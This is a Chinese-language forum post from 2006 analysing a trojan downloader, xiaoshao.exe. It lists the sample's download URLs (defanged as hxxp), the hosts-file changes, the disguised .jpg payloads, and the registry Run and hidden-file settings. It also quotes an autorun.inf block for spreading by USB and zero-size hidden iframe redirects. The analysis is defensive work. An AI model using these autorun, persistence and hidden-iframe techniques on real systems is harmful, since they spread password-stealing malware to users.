补一点:
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\
SHOWALL
以上一项需要重新写入是来自“香港软件王国”的xiaoshao.exe么?2006-11-11 15:02xiaoshao.exe Trojan-PSW.Win32.Delf.ln
下载:
hxxp://qq.ee28.cn/down/host.txt
设置hosts文件:
127.0.0.1 qq.etsoft.com.cn
61.152.90.31 zt.abcoll.com
下载执行:
hxxp://qq.ee28.cn/down/up.jpg -->update.exe
hxxp://qq.ee28.cn/down/up1.jpg -->update2.exe Trojan-PSW.Win32.QQRob.jo
hxxp://qq.ee28.cn/down/up2.jpg -->update3.exe Trojan-PSW.Win32.Lmir.beh
hxxp://qq.ee28.cn/down/up3.jpg -->update4.exe
hxxp://qq.ee28.cn/down/up4.jpg -->update5.exe失效
hxxp://qq.ee28.cn/down/up5.jpg -->update9.exe
hxxp://qq.ee28.cn/down/up6.jpg -->update7.exe Trojan-PSW.Win32.Nilage.arz
X:\xiaoshen.exe
X:\autorun.inf
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell\Auto\command=xiaoshen.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\
SHOWALL
"CheckedValue"=dword:00000001
MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Update=指向Update.exe
下载的木马不在讨论之内:-)
PS:“day day fucking!by kingdom software,co,hk updating....”来自香港软件王国?
-------------------------------------------------------
说明一下undate.exe的问题,其实是下载一个副本程序。
up.jpg -->update.exe
访问:
<iframe src="hxxp://qq.ee28.cn/htm/" width="0" height="0" scrolling="0" frameborder="0"></iframe>
选择性跳转到hxxp://qq.ee28.cn/htm/s.htm
<iframe src="1234.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script src='hxxp://s78.cnzz.com/stat.php?id=291770&web_id=291770' language='JavaScript' charset='gb2312'></script>
访问计数到这里hxxp://qq.ee28.cn/htm/1234.htm
下载:hxxp://qq.ee28.cn/down/down.exe -->mdb.exe 原来这个是副本
但这个档案比xiaoshao.exe少了下载设置hosts的行为:-)
PS:BBS上常见过几分钟后,update.exe开始下载木马的原因可能就是因为这几个跳转吧:-)
discover information:
come on baby!
string:my name is joines
是作者么?
我的分析贴:
http://hi.baidu.com/killvir/blog/item/fe33033b122784ea14cecb5f.html
